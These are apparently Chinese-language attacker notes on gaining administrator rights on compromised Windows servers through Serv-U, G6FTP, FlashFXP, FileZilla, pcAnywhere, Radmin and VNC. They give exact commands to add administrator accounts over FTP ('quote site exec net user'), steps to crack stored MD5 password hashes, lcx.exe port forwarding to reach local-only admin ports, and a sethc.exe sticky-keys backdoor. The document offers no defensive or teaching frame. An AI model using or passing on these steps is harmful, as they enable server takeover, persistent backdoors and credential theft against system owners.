Server-u提交
有修改权限:
0检查是否有可写权限 修改server-u默认安装目录下的ServUDeamon.ini
添加新user用户,给权限,密码32位MD5加密,密码前有2个字母,md5网站加密,复制其他用户配置,粘贴,修改用户名及密码,加密时要加上前两个字母
ftp ip地址 连接用户
执行命令:
quote site exec net user 用户名 密码 .add
quote site exec net localgroup administrators 用户名 /add
无修改权限:
读取ServUDeamon.ini
拿到MD5加密的密码,解密
纯数字解密工具:
Serv-U纯数字密码破解器
字母解密工具:
passwordpro 右键 密码复制进hash salt写密文前两个字母 选择MD5(salt,pass)
倒数第三个选项,配置密码组成方式
servuadmin扔进C32asm,十六进制打开,ctrl+f,搜索servu-提权显示的用户,ansi字符串搜索,.后面的为用户密码
pcanywhere提权
radmin hash需要转换小写
vcn密码破解:
cmd运行 vncx4.exe -w
讲大马读到的10进制数字转为十六进制输入
g6ftp提权
下载管理配置文件 administrator密码破解 密码为32位加密
默认只允许本机连接,需要lcx端口转发
lcx.exe -tran 8027 127.0.0.1 8021
lcx
g6ftp server 连接
批处理建立超级管理员
上传批处理
ftp执行批处理:quote site 批处理名字
flasFTP提权
下载目标flash安装目录flashFXP,找到quick.dat文件
本机安装,替换,登录
filezilla提权
filezillaserver.xml filezillaserver interface.xml 拿到管理信息
配置端口转发,登录ftp,创建ftp用户,设置家目录为C:\
cmd.exe改名sethc.exe(shift后门) 替换windows\system32\sethc.exe
连接3389 5次shift调出cmd.exe
端口转发:
找有壳读写权限文件夹,上传lcx.exe
执行命令 lcx.exe路径 -tran 转发端口 目标ip 被转发端口
0.0.0.0 代表任何一个地址
127.0.0.1 代表本机
安装服务端,创建账号,给路径,权限
安装客户端连接21端口
pr/巴西烤肉提权
pr.exe "dos命令" 添加超级管理员